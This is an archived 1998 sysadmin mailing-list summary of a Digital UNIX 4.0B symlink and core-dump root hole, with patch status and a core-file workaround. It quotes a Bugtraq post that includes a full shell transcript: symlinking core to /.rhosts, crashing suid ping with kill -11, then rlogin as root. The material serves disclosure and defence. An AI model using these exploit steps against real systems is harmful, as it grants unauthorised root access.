SUMMARY: Symlink/Core Security Hole for DU 4.0B

From: Richard L Jackson Jr <rjackson_at_osf1.gmu.edu>
Date: Sat, 18 Apr 1998 15:57:04 -0400 (EDT)

Hello,

SUMMARY:
--------------------------------------------------------------------------------
The fix for this Digital UNIX 4.0B symbolic link and core file security
issue will be made publicly available, at
ftp://ftp.service.digital.com/public/Digital_UNIX/, in about one week
as patch kit #7, BL9. Digital CSC currently has an advance copy available
upon request if you have a support contract.

All of Digital UNIX 4.0B, pre-patch kit #7, and Digital UNIX 4.0D without
any patches are vulnerable. Digital UNIX 4.0D with patch kit #1 is not
vulnerable.
--------------------------------------------------------------------------------

-- 
Regards,
Richard Jackson
Computer Center Lead Engineer
Mgr, Central Systems & Dept. UNIX Consulting
University Computing & Information Systems (UCIS)
George Mason University, Fairfax, Virginia
RESPONSES:
--------------------------------------------------------------------------------
Dave Dula  dula_at_decatl.alf.dec.com
Richard Boren rich.boren_at_cxo.mts.dec.com
Saul Tannenbaum <stannenb_at_tufts.edu>
Mike Iglesias <iglesias_at_draco.acs.uci.edu>
Ryan Niemes <rwn_at_udayton.edu>
"John P.Speno" <speno_at_isc.upenn.edu>
Bugs Brouillard <bb1_at_axe.humboldt.edu>		<-- NEAT NAME
Andrew Leahy <A.Leahy_at_st.nepean.uws.edu.au>
Girish Phadke <PGIRISH_at_binariang.maxisnet.com.my>
Lucien_HERCAUD_at_paribas.com
Girish Phadke <PGIRISH_at_binariang.maxisnet.com.my>
--------------------------------------------------------------------------------
QUESTION:
--------------------------------------------------------------------------------
A couple of hours ago the below message was posted to bugtraq that
describes yet another way to use symbolic links and core dumps to gain
root access under Digital UNIX.  I contacted Digital CSC and was
informed there may not be a patch for Digital UNIX 4.0B at this time
but the engineer suggested a work around.  Basically, turn on Enhanced
C2 security and disable the creation of core files by adding
u_rlimit_core#0 to the user profile database -- this can be done with
dxaccounts or 'edauth -dp USER'.  It can also be done by doing the
above to your user templates, if defined.
I should hear from the engineer the status of the security hole and 
resolution by tomorrow.
I have only tested the hole with Digital UNIX 4.0B.
BUGTRAQ POST FROM rusty_at_mad.it:
----------------------------------------------------
Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN]
(28/03/1998)
Starting 2 suid root programs in background, and killing them with -11 flag,
we'll have a core root owned with our gid and mode 600. Then is enough a
symlink
to create a file everywhere...like /.rhosts.
rusty_at_mad.it soren_at_atlink.it
$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x   1 root     bin        32768 Nov 16  1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
[1]    Segmentation fault   /usr/sbin/ping somehost (core dumped)
[2]    +Segmentation fault   /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw-------   1 root     system    385024 Mar 29 05:17 /.rhosts
 ##/.rhosts has been created....that's all.##
$ rlogin localhost -l root
Is a very serious problem, it needs a fix as soon as possible,
infact we can have a DoS if we link our core to the kernel.
Other platforms:
SunOs    4.1.x 5.5.x    Doesn't work
Linux       2.0.x             Doesn't work
Digital Unix 4.0d         Doesn't work
Others     (note tested yet)
----------------------------------------------------

Received on Sat Apr 18 1998 - 21:58:05 NZST